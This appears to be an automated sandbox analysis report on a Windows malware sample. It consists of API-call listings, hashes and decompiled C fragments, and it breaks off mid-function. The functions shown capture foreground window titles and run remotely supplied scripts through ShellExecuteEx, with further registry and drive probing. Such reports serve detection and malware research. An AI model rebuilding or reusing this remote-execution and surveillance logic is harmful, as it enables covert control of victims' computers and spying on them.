                                          • ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040E240), ref: 0040F501
                                          • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040E240), ref: 0040F50B
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004108AC,?,00000000,?,?,?,?,?,?,?,?,0040E240), ref: 0040F522
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040E240), ref: 0040F531
                                            • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFC4
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFDB
                                            • Part of subcall function 0040EFB5: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491), ref: 0040EFF1
                                            • Part of subcall function 0040EFB5: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040F00F
                                            • Part of subcall function 0040EFB5: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F019
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F022
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F037
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F044
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F096
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F09F
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F0A8
                                          • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(00000000,00000000,00000000), ref: 0040F562
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F58D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040E240), ref: 0040F596
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F5AB
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F5DC
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F5E5
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@$D@1@@V12@Window$?begin@?$basic_string@?c_str@?$basic_string@?find@?$basic_string@TextV01@@$??4?$basic_string@?end@?$basic_string@?substr@?$basic_string@ForegroundLengthV01@
                                          • String ID:
                                          • API String ID: 3496238640-0
                                          • Opcode ID: d78fe6c2566b637451fcc8495cb98b3847fa1ecb3c1eee7ec14cfc758dd3ef6a
                                          • Instruction ID: 154c6d577414d328a897fa1d3e202a68548f2e644e003aaa846313a3066079b3
                                          • Opcode Fuzzy Hash: d78fe6c2566b637451fcc8495cb98b3847fa1ecb3c1eee7ec14cfc758dd3ef6a
                                          • Instruction Fuzzy Hash: E6412E31500009ABCB14EBA5DD5A9FE7BB8EB54305B504179F807B21E0EFB45E89CAA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 004039D1
                                            • Part of subcall function 0040F4A3: GetForegroundWindow.USER32(74B06490,00415940,?,?,?,?,?,?,?,?,0040E240), ref: 0040F4AB
                                            • Part of subcall function 0040F4A3: GetWindowTextLengthA.USER32(00000000), ref: 0040F4B4
                                            • Part of subcall function 0040F4A3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,0040E240), ref: 0040F4CD
                                            • Part of subcall function 0040F4A3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,0040E240), ref: 0040F4D6
                                            • Part of subcall function 0040F4A3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040E240), ref: 0040F4E0
                                            • Part of subcall function 0040F4A3: GetWindowTextA.USER32 ref: 0040F4E8
                                            • Part of subcall function 0040F4A3: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,?,?,?,?,?,?,0040E240), ref: 0040F4F7
                                            • Part of subcall function 0040F4A3: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040E240), ref: 0040F501
                                            • Part of subcall function 0040F4A3: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040E240), ref: 0040F50B
                                            • Part of subcall function 0040F4A3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004108AC,?,00000000,?,?,?,?,?,?,?,?,0040E240), ref: 0040F522
                                            • Part of subcall function 0040F4A3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040E240), ref: 0040F531
                                            • Part of subcall function 0040F4A3: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(00000000,00000000,00000000), ref: 0040F562
                                            • Part of subcall function 0040F4A3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F58D
                                            • Part of subcall function 0040F4A3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040E240), ref: 0040F596
                                          • Sleep.KERNEL32(000003E8), ref: 004039E8
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?, ]), ref: 004039FF
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[ ,00000000), ref: 00403A0F
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00403A1C
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00403A2B
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403A34
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403A3D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403A46
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00403A55
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00403A73
                                          • Sleep.KERNEL32(000003E8), ref: 00403A8A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@V01@@$D@1@@Window$?begin@?$basic_string@D@2@@0@Hstd@@SleepTextV?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?end@?$basic_string@?find@?$basic_string@?length@?$basic_string@ForegroundLengthV01@V10@V10@@V12@
                                          • String ID: [ $ ]
                                          • API String ID: 1155922707-93608704
                                          • Opcode ID: 028624cf86794867e41c357077a072d6be74b9f20b38747f7632aa35c991c93f
                                          • Instruction ID: 47295d00c881f16adcdb252269db0bc951bee967cd76f0c472b369b741ed2101
                                          • Opcode Fuzzy Hash: 028624cf86794867e41c357077a072d6be74b9f20b38747f7632aa35c991c93f
                                          • Instruction Fuzzy Hash: 31219BB1A00109ABDB40BB75DC5AAEF7F7CAB44304F0045BAF506B31D2DE785A498B9D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,7313CB00), ref: 004083F4
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040BF72), ref: 004083FD
                                          • GetDriveTypeA.KERNEL32(00000000,?,0000000A), ref: 00408415
                                          • _itoa.MSVCRT ref: 0040841C
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,0000002D), ref: 00408432
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040843A
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00000000), ref: 00408449
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 00408456
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408462
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040846B
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408474
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040847D
                                          • lstrlenA.KERNEL32(00000000), ref: 00408484
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040849A
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040BF72), ref: 004084A3
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040BF72), ref: 004084AC
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@2@@0@Hstd@@V01@@V10@V?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?data@?$basic_string@DriveTypeV01@_itoalstrlen
                                          • String ID:
                                          • API String ID: 3966177967-0
                                          • Opcode ID: 35d56568f8730d340fd7fa84469ab2b745bf81bdac80b614cf61c9766c113363
                                          • Instruction ID: f6cd9da774f90e216c8850a182eab4fb86b9b379ce6a16f8b7c54746bda286dd
                                          • Opcode Fuzzy Hash: 35d56568f8730d340fd7fa84469ab2b745bf81bdac80b614cf61c9766c113363
                                          • Instruction Fuzzy Hash: 25219A7190010EABCB14DBA0ED4D9DE7BB8EF54305B104475E506A2190EF74AF49CB59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 64%
                                          			E0040F9EF(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                          				struct tagPOINT _v12;
                                          				void* _t16;
                                          				struct HMENU__* _t17;
                                          				void* _t20;
                                          				void* _t24;
                                          
                                          				_t16 = _a8 - 1;
                                          				if(_t16 == 0) {
                                          					_t17 = CreatePopupMenu();
                                          					 *0x415ba0 = _t17;
                                          					AppendMenuA(_t17, 0, 0, "Close");
                                          					L15:
                                          					return 0;
                                          				}
                                          				_t20 = _t16 - 0x110;
                                          				if(_t20 == 0) {
                                          					if(_a12 != 0) {
                                          						goto L15;
                                          					}
                                          					Shell_NotifyIconA(2, 0x415bb0);
                                          					ExitProcess(0);
                                          				}
                                          				if(_t20 == 0x2f0) {
                                          					_t24 = _a16 - 0x201;
                                          					if(_t24 == 0) {
                                          						if(IsWindowVisible( *0x415bac) == 0) {
                                          							ShowWindow( *0x415bac, 9);
                                          							SetForegroundWindow( *0x415bac);
                                          						} else {
                                          							ShowWindow( *0x415bac, 0);
                                          						}
                                          						goto L15;
                                          					}
                                          					if(_t24 == 3) {
                                          						GetCursorPos( &_v12);
                                          						SetForegroundWindow(_a4);
                                          						TrackPopupMenu( *0x415ba0, 0, _v12, _v12.y, 0, _a4, 0);
                                          						goto L15;
                                          					}
                                          					_push(_a16);
                                          					_push(_a12);
                                          					_push(0x401);
                                          					L4:
                                          					return DefWindowProcA(_a4, ??, ??, ??);
                                          				}
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				goto L4;
                                          			}








                                          0x0040f9f7
                                          0x0040f9f8
                                          0x0040facc
                                          0x0040fadc
                                          0x0040fae1
                                          0x0040fae7
                                          0x00000000
                                          0x0040fae7
                                          0x0040f9fe
                                          0x0040fa03
                                          0x0040fab3
                                          0x00000000
                                          0x00000000
                                          0x0040fabc
                                          0x0040fac4
                                          0x0040fac4
                                          0x0040fa0e
                                          0x0040fa2a
                                          0x0040fa2f
                                          0x0040fa81
                                          0x0040fa9b
                                          0x0040faa7
                                          0x0040fa83
                                          0x0040fa8b
                                          0x0040fa8b
                                          0x00000000
                                          0x0040fa81
                                          0x0040fa34
                                          0x0040fa47
                                          0x0040fa50
                                          0x0040fa6b
                                          0x00000000
                                          0x0040fa6b
                                          0x0040fa36
                                          0x0040fa39
                                          0x0040fa3c
                                          0x0040fa19
                                          0x00000000
                                          0x0040fa1c
                                          0x0040fa10
                                          0x0040fa13
                                          0x0040fa16
                                          0x00000000

                                          APIs
                                          • DefWindowProcA.USER32(?,00000401,?,?), ref: 0040FA1C
                                          • GetCursorPos.USER32(?), ref: 0040FA47
                                          • SetForegroundWindow.USER32(?), ref: 0040FA50
                                          • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0040FA6B
                                          • Shell_NotifyIconA.SHELL32(00000002,00415BB0), ref: 0040FABC
                                          • ExitProcess.KERNEL32 ref: 0040FAC4
                                          • CreatePopupMenu.USER32 ref: 0040FACC
                                          • AppendMenuA.USER32 ref: 0040FAE1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                          • String ID: Close
                                          • API String ID: 1657328048-3535843008
                                          • Opcode ID: d6ed23cd633fae06e75435f563c32a18db35a532ce573e8f95f6d74bc3567ba5
                                          • Instruction ID: 8e1ada1201d2f43d84cd2c70e63543890078da6759be781d4fcfc1fc91c4ebbf
                                          • Opcode Fuzzy Hash: d6ed23cd633fae06e75435f563c32a18db35a532ce573e8f95f6d74bc3567ba5
                                          • Instruction Fuzzy Hash: BC21DA31244209EFDF259FA4ED49BDA3B75AB44701F508031F609A45F0C7B59964EF1D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040D3B6
                                          • SetEvent.KERNEL32(?), ref: 0040D3BF
                                          • CloseHandle.KERNEL32(?), ref: 0040D3C8
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00415268), ref: 0040D3D8
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040D3E7
                                            • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFC4
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFDB
                                            • Part of subcall function 0040EFB5: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491), ref: 0040EFF1
                                            • Part of subcall function 0040EFB5: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040F00F
                                            • Part of subcall function 0040EFB5: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F019
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F022
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F037
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F044
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F096
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F09F
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F0A8
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,00000000), ref: 0040D407
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,exec), ref: 0040D416
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D432
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D448
                                            • Part of subcall function 0040D20D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004108CC,?,?,?,?), ref: 0040D228
                                            • Part of subcall function 0040D20D: getenv.MSVCRT ref: 0040D234
                                            • Part of subcall function 0040D20D: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?), ref: 0040D240
                                            • Part of subcall function 0040D20D: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040D24D
                                            • Part of subcall function 0040D20D: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D258
                                            • Part of subcall function 0040D20D: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D261
                                            • Part of subcall function 0040D20D: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 0040D26E
                                            • Part of subcall function 0040D20D: ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040D27B
                                            • Part of subcall function 0040D20D: ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040D287
                                            • Part of subcall function 0040D20D: ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 0040D2A0
                                            • Part of subcall function 0040D20D: ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040D2AD
                                            • Part of subcall function 0040D20D: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D2CC
                                            • Part of subcall function 0040D20D: ShellExecuteExA.SHELL32(0000003C), ref: 0040D2E9
                                            • Part of subcall function 0040D20D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(remscriptexecd,?), ref: 0040D30D
                                            • Part of subcall function 0040D20D: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040D31F
                                            • Part of subcall function 0040D20D: CloseHandle.KERNEL32(?), ref: 0040D328
                                            • Part of subcall function 0040D20D: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D331
                                            • Part of subcall function 0040D20D: DeleteFileA.KERNEL32(00000000), ref: 0040D338
                                            • Part of subcall function 0040D20D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(remscriptsuccess,?,?,?,?,?), ref: 0040D352
                                            • Part of subcall function 0040D20D: ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?), ref: 0040D380
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D459
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D46A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$D@1@@D@std@@@std@@V?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@D@2@@0@$CloseHandleHstd@@V12@$??0?$basic_ofstream@??4?$basic_string@??6std@@??8std@@?close@?$basic_ofstream@?find@?$basic_string@?is_open@?$basic_ofstream@?substr@?$basic_string@D?$basic_ofstream@D@2@@0@@D@std@@@0@DeleteEventExecuteFileObjectShellSingleV01@V10@V10@0@V10@@V?$basic_ostream@Waitgetenv
                                          • String ID: exec
                                          • API String ID: 1002160170-3144634053
                                          • Opcode ID: 56fcbabcf975ea0c7de527fb19e0c164c1539da4d09a0a8bf085cf32e83460a5
                                          • Instruction ID: 2a1242b9f6ee79d5d393efb9909d70216f0b734506a354a1a0805bdd98583fd6
                                          • Opcode Fuzzy Hash: 56fcbabcf975ea0c7de527fb19e0c164c1539da4d09a0a8bf085cf32e83460a5
                                          • Instruction Fuzzy Hash: 89213072910119ABCF04BBE5DC5E9EE7B78FF14305F004469F912A20E1EE785988CB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKLM,00415268,?,00409C86), ref: 004094F1
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKCU), ref: 00409509
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409561
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040956E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@??8std@@D@2@@0@D@2@@std@@V?$basic_string@
                                          • String ID: HKCC$HKCR$HKCU$HKLM$HKU
                                          • API String ID: 2054586871-62392802
                                          • Opcode ID: 1e8cfaee7e8edccd3cbd4cc1fc534f52dd70c70e2637a942119cbfc6a749a9cb
                                          • Instruction ID: d777f3dda36179113423a7ed30754d26adfb0a2fc6db248441cd5d77bc2a580d
                                          • Opcode Fuzzy Hash: 1e8cfaee7e8edccd3cbd4cc1fc534f52dd70c70e2637a942119cbfc6a749a9cb
                                          • Instruction Fuzzy Hash: 0501C43B58422A73CE059AD5EC15AD927088B053A5F2000B7AA00F75D2CE7CDEC98BC9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E0040C8F3(struct HWND__* _a4, char _a7) {
                                          				char _v16;
                                          				char _v32;
                                          				char _v48;
                                          				char _v64;
                                          				char _v80;
                                          				char _v96;
                                          				short _v696;
                                          				void* _t24;
                                          				char* _t33;
                                          				char* _t34;
                                          				char* _t35;
                                          
                                          				GetWindowTextW(_a4,  &_v696, 0x12c);
                                          				if(IsWindowVisible(_a4) != 0 && _v696 != 0) {
                                          					sprintf( &_v16, 0x411734, _a4);
                                          					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &_v696,  &_a7);
                                          					_t33 =  &_v64;
                                          					L0040FC20();
                                          					_t34 =  &_v48;
                                          					L0040FC20();
                                          					_t35 =  &_v96;
                                          					L0040FC20();
                                          					__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t35, _t35, _t34, _t34, _t33, _t33, E0040EDD3( &_v80,  &_v32), 0x41171c,  &_v16, 0x411728);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
